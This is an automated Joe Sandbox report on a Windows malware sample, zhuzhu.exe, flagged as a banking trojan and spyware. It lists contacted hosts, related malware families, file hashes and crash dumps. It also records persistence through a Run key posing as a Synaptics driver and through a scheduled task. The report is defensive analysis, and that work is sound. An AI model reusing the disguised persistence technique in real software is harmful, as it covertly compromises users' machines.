                                                                                                                                        		drive.usercontent.google.comUnited States
                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                        1.192.136.170
                                                                                                                                        		st.p.360.cnChina
                                                                                                                                        		137687CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePRfalse
                                                                                                                                        118.107.44.219
                                                                                                                                        		unknownSingapore
                                                                                                                                        		64050BCPL-SGBGPNETGlobalASNSGtrue

                                                                                                                                        General Information

                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                        Analysis ID:1582239
                                                                                                                                        Start date and time:2024-12-30 04:58:07 +01:00
                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                        Overall analysis duration:0h 13m 4s
                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                        Report type:full
                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                        Number of analysed new started processes analysed:28
                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                        Technologies:
                                                                                                                                        • HCA enabled
                                                                                                                                        • EGA enabled
                                                                                                                                        • AMSI enabled
                                                                                                                                        Analysis Mode:default
                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                        Sample name:zhuzhu.exe
                                                                                                                                        Detection:MAL
                                                                                                                                        Classification:mal100.bank.troj.spyw.expl.evad.winEXE@26/101@20/14
                                                                                                                                        EGA Information:
                                                                                                                                        • Successful, ratio: 80%
                                                                                                                                        HCA Information:
                                                                                                                                        • Successful, ratio: 73%
                                                                                                                                        • Number of executed functions: 332
                                                                                                                                        • Number of non-executed functions: 185
                                                                                                                                        Cookbook Comments:
                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                        Warnings

                                                                                                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                        • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.113.194.132, 184.28.90.27, 40.79.189.58, 52.182.143.212, 20.189.173.20, 40.126.32.68, 52.149.20.212, 13.107.246.45
                                                                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, onedscolprdjpe02.japaneast.cloudapp.azure.com, europe.configsvc1.live.com.akadns.n
                                                                                                                                        • Execution Graph export aborted for target Synaptics.exe, PID 5780 because there are no executed function
                                                                                                                                        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                        Simulations

                                                                                                                                        Behavior and APIs

                                                                                                                                        TimeTypeDescription
                                                                                                                                        03:59:03AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        03:59:08Task SchedulerRun new task: .Net OneStart path: C:\Users\user\Downloads\inst.exe
                                                                                                                                        22:59:06API Interceptor459x Sleep call for process: Synaptics.exe modified
                                                                                                                                        22:59:08API Interceptor2562297x Sleep call for process: ._cache_zhuzhu.exe modified
                                                                                                                                        22:59:09API Interceptor8x Sleep call for process: powershell.exe modified
                                                                                                                                        22:59:46API Interceptor4237170x Sleep call for process: inst.exe modified
                                                                                                                                        23:00:05API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                                                                        23:01:03API Interceptor1360206x Sleep call for process: splwow64.exe modified

                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                        IPs

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        39.156.85.201QQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                          wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                            39.156.85.200QQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                            • pinst.360.cn/360safe/h_inst.cab?rd=10788264
                                                                                                                                            1.192.136.135QQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                              wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                39.156.85.231wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                • pinst.360.cn/360safe/h_inst.cab?rd=36608336
                                                                                                                                                180.163.251.230wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                • s.360.cn/safe/instcomp.htm?soft=1000&status=129&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid=
                                                                                                                                                1.192.136.134QQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                  wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                    1.192.136.133QQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                      wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                        360#U6d4b#U901f.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                          Domains

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.comQQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                          • 47.79.48.211
                                                                                                                                                          s-part-0017.t-0009.t-msedge.net017069451a4dbc523a1165a2f1bd361a762bb40856778.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 13.107.246.45
                                                                                                                                                          http://nemoinsure.comGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 13.107.246.45
                                                                                                                                                          https://1drv.ms/o/c/1ba8fd2bd98c98a8/EmMMbLWVyqxBh9Z6zxri2ZUBVkwUpSiY2KbvhupkdaFzGA?e=F6pNlDGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 13.107.246.45
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 13.107.246.45
                                                                                                                                                          Kellyb Timesheet Report.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 13.107.246.45
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 13.107.246.45
                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                          • 13.107.246.45
                                                                                                                                                          ceFgl3jkkk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 13.107.246.45
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 13.107.246.45
                                                                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 13.107.246.45
                                                                                                                                                          tr.p.360.cnQQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                          • 1.192.136.134
                                                                                                                                                          wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                          • 1.192.136.132
                                                                                                                                                          freedns.afraid.orgPurchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          Dzsb.Qyd.Install.exeGet hashmaliciousXRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          agt.p.360.cnQQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                          • 1.192.136.133
                                                                                                                                                          wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                          • 1.192.136.132
                                                                                                                                                          A1FsbRkm5m.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 1.192.136.132
                                                                                                                                                          agd2.p.360.cnQQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                          • 1.192.194.215
                                                                                                                                                          wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                          • 1.192.194.232

                                                                                                                                                          ASNs

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          CMNET-GDGuangdongMobileCommunicationCoLtdCNloligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 218.201.238.247
                                                                                                                                                          loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 120.206.216.207
                                                                                                                                                          arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                          • 117.156.66.127
                                                                                                                                                          x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                          • 111.10.231.158
                                                                                                                                                          QQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                          • 39.156.85.231
                                                                                                                                                          wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                          • 39.156.85.231
                                                                                                                                                          db0fa4b8db0333367e9bda3ab68b8042.m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                          • 117.150.97.30
                                                                                                                                                          db0fa4b8db0333367e9bda3ab68b8042.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                          • 117.151.161.150
                                                                                                                                                          db0fa4b8db0333367e9bda3ab68b8042.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                          • 117.135.228.168
                                                                                                                                                          db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                          • 36.169.144.160
                                                                                                                                                          CMNET-GDGuangdongMobileCommunicationCoLtdCNloligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 218.201.238.247
                                                                                                                                                          loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 120.206.216.207
                                                                                                                                                          arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                          • 117.156.66.127
                                                                                                                                                          x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                          • 111.10.231.158
                                                                                                                                                          QQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                          • 39.156.85.231
                                                                                                                                                          wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                          • 39.156.85.231
                                                                                                                                                          db0fa4b8db0333367e9bda3ab68b8042.m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                          • 117.150.97.30
                                                                                                                                                          db0fa4b8db0333367e9bda3ab68b8042.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                          • 117.151.161.150
                                                                                                                                                          db0fa4b8db0333367e9bda3ab68b8042.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                          • 117.135.228.168
                                                                                                                                                          db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                          • 36.169.144.160
                                                                                                                                                          CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePRQQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                          • 1.192.136.170
                                                                                                                                                          wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                          • 1.192.136.170
                                                                                                                                                          mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 1.192.222.114
                                                                                                                                                          mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                          • 1.192.240.164
                                                                                                                                                          Josho.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 1.192.222.117
                                                                                                                                                          meerkat.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 1.192.193.56
                                                                                                                                                          mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 36.99.183.94
                                                                                                                                                          x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                          • 1.192.193.76
                                                                                                                                                          la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 1.192.240.133
                                                                                                                                                          m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                          • 36.99.33.202

                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 142.250.181.238
                                                                                                                                                          • 142.250.186.129
                                                                                                                                                          • 47.79.48.211
                                                                                                                                                          Lets-x64.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                                                          • 142.250.181.238
                                                                                                                                                          • 142.250.186.129
                                                                                                                                                          • 47.79.48.211
                                                                                                                                                          KL-3.1.16.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                                                          • 142.250.181.238
                                                                                                                                                          • 142.250.186.129
                                                                                                                                                          • 47.79.48.211
                                                                                                                                                          Whyet-4.9.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                                                          • 142.250.181.238
                                                                                                                                                          • 142.250.186.129
                                                                                                                                                          • 47.79.48.211
                                                                                                                                                          QQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                          • 142.250.181.238
                                                                                                                                                          • 142.250.186.129
                                                                                                                                                          • 47.79.48.211
                                                                                                                                                          wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                          • 142.250.181.238
                                                                                                                                                          • 142.250.186.129
                                                                                                                                                          • 47.79.48.211
                                                                                                                                                          aYu936prD4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 142.250.181.238
                                                                                                                                                          • 142.250.186.129
                                                                                                                                                          • 47.79.48.211
                                                                                                                                                          aYu936prD4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 142.250.181.238
                                                                                                                                                          • 142.250.186.129
                                                                                                                                                          • 47.79.48.211
                                                                                                                                                          Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                          • 142.250.181.238
                                                                                                                                                          • 142.250.186.129
                                                                                                                                                          • 47.79.48.211
                                                                                                                                                          Gabriel-4.9.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                                                          • 142.250.181.238
                                                                                                                                                          • 142.250.186.129
                                                                                                                                                          • 47.79.48.211

                                                                                                                                                          Dropped Files

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\inst[1].exeQQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                            wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\{92EE34F9-CBF9-4899-A446-C0FD9C9E29A7}.tmp\360P2SP.dllQQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                                wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                                  A1FsbRkm5m.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                    C:\Program Files (x86)\360\360Safe\{FD2C39FB-F4D3-4b94-BD68-BE991C2FC645}.tf

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):38
                                                                                                                                                                    Entropy (8bit):2.663180203976347
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Sclj4I9R:vlEI9R
                                                                                                                                                                    MD5:68EDAF4FBCFFFB168E50C1695BA620E1
                                                                                                                                                                    SHA1:7D42060D5E0153562EE4E1564D505E4438BE23A9
                                                                                                                                                                    SHA-256:2DAE268E38E73A7E317C296B1FFD3941AF87DD7822968CFA0FCF8C1426DB7534
                                                                                                                                                                    SHA-512:2E204EFF691837D3472C4EEC9EE886C8A9CD5A482893EFC95AE23FA622657EA4E04777A9D99A10074A9C003CEA15CB5D69EC09418015A5A49228BBFB741D8D5F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:{.F.D.2.C.3.9.F.B.-.F.4.D.3.-.4.b.9.4.

                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):118
                                                                                                                                                                    Entropy (8bit):3.5700810731231707
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                                                                    MD5:573220372DA4ED487441611079B623CD
                                                                                                                                                                    SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                                                                    SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                                                                    SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_2ec6c543e663fbcb7aa81b84b010deff7deb3a8e_455b7b6e_d6a569a7-6642-4538-8b43-920d5da35af4\Report.wer

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                    Entropy (8bit):1.133645338198185
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:GvNWVpszImV0BU/3DzJDzqjYdA/NczxwzuiFUZ24IO8EKDzy:pyzMBU/3Jqj8KzuiFUY4IO8zy
                                                                                                                                                                    MD5:3C8D3FD2F52C16261488F4390DAD7D92
                                                                                                                                                                    SHA1:302A38C5FE3BFEBDF674568AC160447D04DE2502
                                                                                                                                                                    SHA-256:1AA49E52A25F8C4EBF49D1096E20A16EA5FE554B0982D2C59A9D9E855F986539
                                                                                                                                                                    SHA-512:D1A88EF46ED4FC625406C91967C30123D0733BB773EF49B7B60C4D0BA00FE3705FCD3C4326B0BC95CC9CF3E9B369806CAF89FD8C452156EDD5DF6239E512A5D4
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.0.4.7.9.5.1.9.6.7.0.5.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.0.4.8.0.2.7.7.4.8.3.1.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.6.a.5.6.9.a.7.-.6.6.4.2.-.4.5.3.8.-.8.b.4.3.-.9.2.0.d.5.d.a.3.5.a.f.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.7.1.e.7.e.8.b.-.7.8.3.a.-.4.4.f.d.-.9.2.6.8.-.7.c.4.c.1.0.0.d.c.8.2.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.9.4.-.0.0.0.1.-.0.0.1.4.-.a.f.f.d.-.9.4.2.7.6.f.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.7.a.3.9.2.2.c.6.d.e.7.b.4.2.4.8.3.e.4.8.6.4.4.c.9.1.7.a.d.a.5.4.6.7.f.d.1.a.4.4.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_6751ccd5199dfc6aae4d63e074afd0eab89d0a7_455b7b6e_91ae11ba-0554-431f-afd5-a98f70ec6dfa\Report.wer

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                    Entropy (8bit):1.1332002667214085
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:066FWVpsnImy0RbgFqfDzJDzqjYdA/NczxwzuiFUZ24IO8EKDzy:0h4ynTRbQcJqj8KzuiFUY4IO8zy
                                                                                                                                                                    MD5:5A4647F1732A39BC6B030D0A7F1EF670
                                                                                                                                                                    SHA1:23150CD47BE75AEA5A1E92FB20A9B92DACD9317F
                                                                                                                                                                    SHA-256:1F36E48DDD3610556A7A911F5645CF767E13A18E727CED30A762F0804F8C337B
                                                                                                                                                                    SHA-512:967868886706994844A84CCF4E0944D7BBE3AA6FBAB559568725E1389668E3D48347D6F0F7B6D5792B7739C43283016C95B61953FCC422BEEF2C530BF06ED5B5
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.0.4.8.0.6.3.5.1.2.2.3.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.0.4.8.1.4.1.3.2.4.7.4.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.1.a.e.1.1.b.a.-.0.5.5.4.-.4.3.1.f.-.a.f.d.5.-.a.9.8.f.7.0.e.c.6.d.f.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.1.2.3.0.8.e.5.-.c.6.9.9.-.4.5.e.5.-.8.6.1.3.-.2.6.b.9.b.0.6.e.a.4.5.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.9.4.-.0.0.0.1.-.0.0.1.4.-.a.f.f.d.-.9.4.2.7.6.f.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.7.a.3.9.2.2.c.6.d.e.7.b.4.2.4.8.3.e.4.8.6.4.4.c.9.1.7.a.d.a.5.4.6.7.f.d.1.a.4.4.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC3B5.tmp.dmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Mon Dec 30 03:59:57 2024, 0x1205a4 type
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4005354
                                                                                                                                                                    Entropy (8bit):2.300483170727101
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:Y16Ids+/wdV5yTrU3KMapwD0uWG5/iQ87E0/OwuHeaDoQTTvRWnaLH1tEfWSxHNS:YtC+Q2kispBrjHJQaLHkJxHNl
                                                                                                                                                                    MD5:D1AE3975D52BD8C8934A67E340069148
                                                                                                                                                                    SHA1:F7085C94D55C4ADB675A479DAB9FD383A80930D7
                                                                                                                                                                    SHA-256:9F2A62F5E894D9A376CC9C20C84D7170C2FFD26E945BF847EF5006FF2A65C729
                                                                                                                                                                    SHA-512:3575E3151750950D05D8F1B903888E0A42BCE9169DA0671187953AF7F90C40EFBD61960833CD517B9B82A957F0D0ED05129FB16B26D94A946EEA6FC38060EC65
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:MDMP..a..... .........rg............TU..............h\......$....|......4...............`.......8...........T...........(....A;.........4|.......... ~..............................................................................eJ.......~......GenuineIntel............T.............rg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERCF4.tmp.WERInternalMetadata.xml

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):6304
                                                                                                                                                                    Entropy (8bit):3.712771924555677
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:R6l7wVeJVxn6OuQYiSoxI7pDH89bwdsfKQm:R6lXJr6OuQYgdwWf8
                                                                                                                                                                    MD5:9CC4B1A1AFA2D5A4CB64D2DF69BC0AB5
                                                                                                                                                                    SHA1:C74C752FFC46BC940C4B013A2D801BBA6F1CA499
